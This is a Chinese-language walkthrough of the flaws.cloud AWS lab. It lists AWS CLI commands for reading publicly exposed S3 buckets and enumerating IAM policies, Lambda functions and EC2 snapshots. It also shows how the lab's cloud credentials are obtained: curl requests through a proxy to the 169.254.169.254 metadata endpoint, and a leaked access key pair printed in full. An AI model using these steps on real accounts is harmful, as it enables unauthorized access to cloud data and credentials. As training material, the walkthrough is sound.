借助网上提供的漏洞环境,了解了下AWS S3 Bucket在配置不当时产生的安全问题,包括未授权访问、秘钥泄露等安全问题。
前言
amazon (S3) 是一个公开的服务,Web 应用程序开发人员可以使用它存储数字资产,包括图片、视频、音乐和文档。 S3 提供一个 RESTful API 以编程方式实现与该服务的交互。
实验环境
信息收集
查看托管服务器
1
2
| #nslookup 54.231.184.255
255.184.231.54.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
|
可访问:http://flaws.cloud.s3-website-us-west-2.amazonaws.com/
未授权访问
1
| aws s3 ls s3://flaws.cloud --no-sign-request --region us-west-2
|
1
| http://flaws.cloud.s3.amazonaws.com/
|
1
| aws s3 --profile YOUR_ACCOUNT ls s3://level2.flaws.cloud
|
下载文件(单个)
1
| aws s3 cp s3://flaws.cloud/secret.html /home --no-sign-request --region us-west-2
|
下载文件(全部)
1
| aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
|
S3存储器四项权限
1
| List, Upload/Delete, View Parmissions, Edit Parmissions
|
可利用代理的情况下获取元数据
1
2
| curl http://169.254.169.254/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
|
1
2
| curl http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
|
秘钥泄露
泄露秘钥
1
2
| access_key AKIAJ366LIPB4IJKT7SA
secret_access_key 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
|
通过秘钥连接aws存储器
1
| aws configure --profile flaws
|
存在token的话在~/.aws/credentials文件下加入toeken信息,aws_session_token
1
| aws --profile flaws s3 ls
|
存在权限问题会出现Access Denied错误,可指定bucket访问,出现InvalidAccessKeyId error则说明需要token信息
低权限bucket直接读取
1
2
| aws --profile lv6 s3 sync s3://flaws.cloud/ .
aws --profile lv6 s3 cp s3://flaws.cloud/robots.txt .
|
获取账户ID
1
2
3
4
5
6
| #aws --profile flaws sts get-caller-identity
{
"Account": "975426262029",
"UserId": "AIDAJQ3H5DC3LEG2BKSLC",
"Arn": "arn:aws:iam::975426262029:user/backup"
}
|
1
2
3
4
5
6
7
8
9
10
| #aws --profile lv6 iam get-user
{
"User": {
"UserName": "Level6",
"Path": "/",
"CreateDate": "2017-02-26T23:11:16Z",
"UserId": "AIDAIRMDOSCWGLCDWOG6A",
"Arn": "arn:aws:iam::975426262029:user/Level6"
}
}
|
已知用户名获取配置的策略
1
2
3
4
5
6
7
8
9
10
11
12
13
| #aws --profile lv6 iam list-attached-user-policies --user-name Level6
{
"AttachedPolicies": [
{
"PolicyName": "list_apigateways",
"PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
},
{
"PolicyName": "MySecurityAudit",
"PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
}
]
}
|
获取策略的版本id
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| #aws --profile lv6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
{
"Policy": {
"PolicyName": "list_apigateways",
"Description": "List apigateways",
"PermissionsBoundaryUsageCount": 0,
"CreateDate": "2017-02-20T01:45:17Z",
"AttachmentCount": 1,
"IsAttachable": true,
"PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
"DefaultVersionId": "v4",
"Path": "/",
"Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
"UpdateDate": "2017-02-20T01:48:17Z"
}
}
|
已知version id,获取策略具体信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| # aws --profile lv6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
{
"PolicyVersion": {
"CreateDate": "2017-02-20T01:48:17Z",
"VersionId": "v4",
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"apigateway:GET"
],
"Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
"Effect": "Allow"
}
]
},
"IsDefaultVersion": true
}
}
|
列出可调用函数,可获取函数名称
1
2
3
4
| aws --region us-west-2 --profile level6 lambda list-functions
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id“s33ppypa75”
利用stageName、region 以及函数名,拼凑出完整的 API 路径。
|
列出快照
1
2
| aws --profile flaws ec2 describe-snapshots
aws --profile flaws ec2 describe-snapshots --owner-id 975426262029
|
创建快照卷
1
| aws --profile YOUR_ACCOUNT ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
|
将快照挂载到aws服务器,需要aws账号,暂未进行。。
参考
1
| https://www.freebuf.com/articles/system/129667.html
|
